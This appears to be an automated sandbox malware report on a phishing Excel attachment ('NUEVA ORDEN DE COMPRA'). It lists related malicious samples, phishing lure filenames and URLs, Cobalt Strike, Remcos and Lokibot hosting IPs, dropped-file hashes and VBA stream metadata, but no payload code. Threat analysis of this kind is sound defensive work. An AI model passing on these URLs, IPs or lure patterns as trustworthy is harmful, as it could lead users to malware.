                          seethebestthignswhichgivingbestthingstogetmakeuveryhappy.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                          • 198.46.178.155
                          goodthingsbestviewtoseethebetterthingswithmygirlfriend.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                          • 192.3.101.21
                          1730205125e17c77fd100fac247e845e0d35eb80fd3ed2b798c588796b720ffad142a2b233827.dat-decoded.exeGet hashmaliciousRemcosBrowse
                          • 192.3.101.193
                          greatthingsalwayshappeningwithgreatattitudewithgoodnews.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                          • 198.46.178.155
                          CLOUDFLARENETUSMUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.13.205
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 172.64.41.3
                          http://assets.website-files.com/65f02117700897a29c49fb10/65f7c129cb837c2310c7044e_tisamijujute.pdfGet hashmaliciousUnknownBrowse
                          • 104.18.95.41
                          Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          -Payout Salary Benefits.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                          • 188.114.96.3
                          https://dartergary.wordpress.com/Get hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3JnGet hashmaliciousUnknownBrowse
                          • 104.26.4.39
                          https://massgrave.dev/getGet hashmaliciousUnknownBrowse
                          • 104.21.22.3
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          7dcce5b76c8b17472d024758970a406b0001.xlsGet hashmaliciousRemcosBrowse
                          • 172.67.162.95
                          Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                          • 172.67.162.95
                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                          • 172.67.162.95
                          ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                          • 172.67.162.95
                          ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                          • 172.67.162.95
                          Transferencia.docGet hashmaliciousQuasarBrowse
                          • 172.67.162.95
                          SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                          • 172.67.162.95
                          SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxGet hashmaliciousHTMLPhisherBrowse
                          • 172.67.162.95
                          care.rtfGet hashmaliciousUnknownBrowse
                          • 172.67.162.95
                          No context
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                          Category:dropped
                          Size (bytes):1505804
                          Entropy (8bit):2.2724441801037254
                          Encrypted:false
                          SSDEEP:1536:lQrhWbHXoBJInW1hks7zUqyff15T8BPYI2qvERw/PbKFyjkjzOHK:ZXo7eTyPYI2qMW8
                          MD5:BD7348432D730D0E598D73B7E5CF57D2
                          SHA1:37368BC098DF63863ED9633F6A22BBD9E9F02EF5
                          SHA-256:7D7E6E348B2712249BD4EF777A83EF491F43356FE0F79FA33122DC668C8D934B
                          SHA-512:107E24F5A7C2775E5FA3828112A693601A5F5C30BB33C21FB934FF8F28EE79F3498C977A52958B58DB3F719112C6887D6C21F22D4A557D62AC1A937B651C9947
                          Malicious:false
                          Reputation:low
                          Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                          Category:dropped
                          Size (bytes):172076
                          Entropy (8bit):3.1342558498505824
                          Encrypted:false
                          SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                          MD5:D85DAC1376E45C58F790BD50C2729F6C
                          SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                          SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                          SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                          Category:dropped
                          Size (bytes):3327384
                          Entropy (8bit):2.7194669496410246
                          Encrypted:false
                          SSDEEP:3072:Z7a8PzoHivajYI2qoWdBXo7eTyPYI2qMWyE7jd/adDrvTUrUI+OZurZU:IYIivajYI2qoWdBceTyPYI2qMWKDrvwN
                          MD5:C4DD0C2444A30BE763E47115953CFA07
                          SHA1:99F7022CDE8F26C055FBFEA8B2584D1F8A270D03
                          SHA-256:A1E1DA1D0DED40817B1EAA5BA87075214130D7594F8A1AA77A322D93BB934567
                          SHA-512:00080B200C5FA765FB149EF77D51094CD000E87E3666D5E3BA898FE125AF784DF7893CA7AC65746EB7BCBC01E724FA3E43D9D7C3A712038EF33F1CE91C5A04B6
                          Malicious:false
                          Reputation:low
                          Preview:....l............................S...".. EMF......2.D...-...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):872448
                          Entropy (8bit):7.944156033113642
                          Encrypted:false
                          SSDEEP:12288:UkBPAdpgF4721EYKaV8sCKxPBvEHXsc6LZ+3SlhyF+xxKr1850d1PH5l26:97197zCaZ8H9UeSlhSSUr1852p5l2
                          MD5:E7DB915D10B8ECD6196E7708C741EBB3
                          SHA1:F477B703918E11505DC2A56F9D894A3A834D6CF2
                          SHA-256:266C0044080532F21FBA42E6B7468F0DB03E9DE194B2C937B07A6BF9E080AAD1
                          SHA-512:F4A95B6EFEC16AB857E770F014789D03D63CC8BC0693A9CF97F64FAF21ACBF5DE04E6B5939BB71D1848D82BA012F4C16B408AF3CC28E8B6A368851CD0CC7E3F1
                          Malicious:false
                          Reputation:low
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Cannot read section info
                          Category:dropped
                          Size (bytes):866304
                          Entropy (8bit):7.9810517971330155
                          Encrypted:false
                          SSDEEP:12288:5kBPAdpgF4721EYKaV8sCKxPBvEHXsc6LZ+3SlhyF+xxKr1850d1PH5l26:m7197zCaZ8H9UeSlhSSUr1852p5l2
                          MD5:28D94572F4A77AE68DA676AAFB1DC033
                          SHA1:4722F61BAF7146115E226DB1AD38F443F481EF49
                          SHA-256:9C426BC6578798E8C3DFCD7E8CAD6D3A1F289E3CBB518FEB3D19F9493A9ECF5F
                          SHA-512:8EA5F93E06CD2D98C9AFA9C1B33D98AB3141AA1A84DF599518E9347E31EB5DC790E7ECAAAFDF9B960337DB9E748A336267D255D503CF69F57E889C2719D7EB8F
                          Malicious:false
                          Reputation:low
                          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):10240
                          Entropy (8bit):0.6739662216458647
                          Encrypted:false
                          SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                          MD5:C61F99FE7BEE945FC31B62121BE075CD
                          SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                          SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                          SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                          Malicious:false
                          Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):24152
                          Entropy (8bit):0.7513521539333206
                          Encrypted:false
                          SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                          MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                          SHA1:FA589EA7BA858C514079289BCEA3625432110427
                          SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                          SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                          Malicious:false
                          Preview: ...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 19:44:41 2024, Security: 1
                          Category:dropped
                          Size (bytes):1133568
                          Entropy (8bit):7.985294756936427
                          Encrypted:false
                          SSDEEP:24576:T7197zCaZ8H9UeSlhSSUr1852p5l27kywfmwFUNHV/:Xb98+dlhw1O2p5l23FwFUN
                          MD5:88392FC0D1913B0113EE893385FF1C2D
                          SHA1:233C0F7D69BEE8BC327EFAA51D6324770D9B041D
                          SHA-256:8F8F225C94999DE347F50A72D93730486EECB188A307B4A86D6D688C986314E3
                          SHA-512:7AE1144803DB44B17CA671E6FDB3DA7C4E4FF0379259918C1681B6F015F5A36F7F20B0CB5918EFD5E9530E5C1CE61331A54EC1BE39C921C0174D03EBB4864C3B
                          Malicious:false
                          Preview:......................>...............................................................................................................w.......y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 19:44:41 2024, Security: 1
                          Category:dropped
                          Size (bytes):1133568
                          Entropy (8bit):7.985294756936427
                          Encrypted:false
                          SSDEEP:24576:T7197zCaZ8H9UeSlhSSUr1852p5l27kywfmwFUNHV/:Xb98+dlhw1O2p5l23FwFUN
                          MD5:88392FC0D1913B0113EE893385FF1C2D
                          SHA1:233C0F7D69BEE8BC327EFAA51D6324770D9B041D
                          SHA-256:8F8F225C94999DE347F50A72D93730486EECB188A307B4A86D6D688C986314E3
                          SHA-512:7AE1144803DB44B17CA671E6FDB3DA7C4E4FF0379259918C1681B6F015F5A36F7F20B0CB5918EFD5E9530E5C1CE61331A54EC1BE39C921C0174D03EBB4864C3B
                          Malicious:false
                          Preview:......................>...............................................................................................................w.......y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:modified
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 15:41:55 2024, Security: 1
                          Entropy (8bit):7.982726640542953
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:NUEVA ORDEN DE COMPRA 73244.xla.xlsx
                          File size:1'227'776 bytes
                          MD5:49aab4d665769ec8184e6bac6da8183f
                          SHA1:350bec361d188495922f12c493ba7e806c2d89ff
                          SHA256:2861d1f7642e8d2bae9122936b7c38a4d53faa9d3c267dc4a46054f54387da6c
                          SHA512:b9b65a1edc698c4f1d91deeb384359f0808c36b82f8f928f38a3e0884436d8ac467286dd002180d041917cdba8a165d27c59ac2b7dd2db649ae19c59a4999073
                          SSDEEP:24576:/1852p5l2QsykgMpRptnPskUcZnujKsUfc27W:/1O2p5l2pFpB0kUcIWf
                          TLSH:EE452305F98ACF4ADF637C3642A8C7820729FE01AF15E1833A92734C69769B513A735D
                          File Content Preview:........................>...............................................................................................................|.......~..............................................................................................................
                          Icon Hash:2562ab89a7b7bfbf
                          Document Type:OLE
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:Microsoft Excel
                          Encrypted Document:True
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:True
                          Code Page:1252
                          Author:
                          Last Saved By:
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2024-10-29 15:41:55
                          Creating Application:Microsoft Excel
                          Security:1
                          Document Code Page:1252
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:786432
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d F . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 64 fd 46 a7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet1"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                          VBA File Name:Sheet2.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d Y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 64 fd db 59 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet2"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                          VBA File Name:Sheet3.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 64 fd e8 16 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet3"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook.cls
                          Stream Size:985
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d S . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 64 fd 53 04 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "ThisWorkbook"
                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.889430592781307
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:200
                          Entropy:3.3020681057018666
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . * . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:MBD00F25730/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:99
                          Entropy:3.631242196770981
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
